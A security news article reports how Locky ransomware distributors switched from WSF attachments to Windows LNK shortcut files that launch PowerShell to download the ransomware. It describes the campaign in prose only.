Locky ransomware has dominated the spam email realm throughout this year. Research, conducted by Proofpoint, revealed that 97% of all infectious spam email attachments were distributing Locky. With the word about the virus’ propagation vector spreading, a change of strategy was required. The carrier was switched from WSF files to LNK files.
Since its inception, Locky has been spread through three different hosts: ZIP folders, macro-laced MS Office files and exploit kits. The ZIP folders have been established as the most prominent distribution technique. They contain multiple files, some or all of which are packed with the executable of Locky. When executed, the wizard installs the ransomware through an automatic process.
The next chapter in the history of Locky has been unfolded
The time line of the virus’ distribution patterns can be divided into separate periods. Chronologically, the ZIP folders first contained JS files, followed by HTA files and later moving on to WSF files. The Microsoft Malware Protection Center reported that Locky ransomware has made the latest change, switching to LNK files.
“We observed that the Locky ransomware writers, possibly upon seeing that some emails are being proactively blocked, changed the attachment from .wsf files to shortcut files (.LNK extension) that contain PowerShell commands to download and run Locky,” a representative of the research team explained.
With the change in the host taking place, Locky seems to be moving away from the Nemucod client. The program is used as an intermediary which helps establish the connection between the ZIP folder and the ransomware. Nemucod assists in getting boot persistence, required to initiate the download of the virus. Another use for the application is testing infected devices for sandboxed environments. The decline in the usage of Nemucod is further confirmation that the developers of Locky have taken on a different approach.
Shortcuts to lockdown – the newest trend in Locky distribution
The latest host the proprietors of Locky have chosen is LNK files. This is the file format of Windows shortcuts. It is used to give quick access to selected directories and programs on the computer. LNK files have been used and continue to be used as a download client for different ransomware programs.
The download of Locky is initialized by linking to a default system component. The ransomware has chosen PowerShell as a means of transportation. PowerShell is a scripting and automation language, present in all versions of the Windows OS. This component is easy to exploit. Malware distributors often make use of it to install rogue programs through an automated process. The user’s permission to run the process is not required. The ransomware is transferred through a packaged PowerShell script, executed when opening the corrupted file.
The image below illustrates how the distribution is carried out. The LNK file creates a shortcut to the PowerShell utility. Clicking on it would prompt the execution of preset parameters and commands.
Apart from being easy to execute, the installation through LNK files is more deceptive. Unlike other file types, shortcuts do not have a default icon. The compromised files can appear with different icons in separate cases.
Logically, the LNK campaigns are connected to the latest version of Locky ransomware. They spread the variant which appends the ODIN suffix. This is further proof that the change of the host was made recently.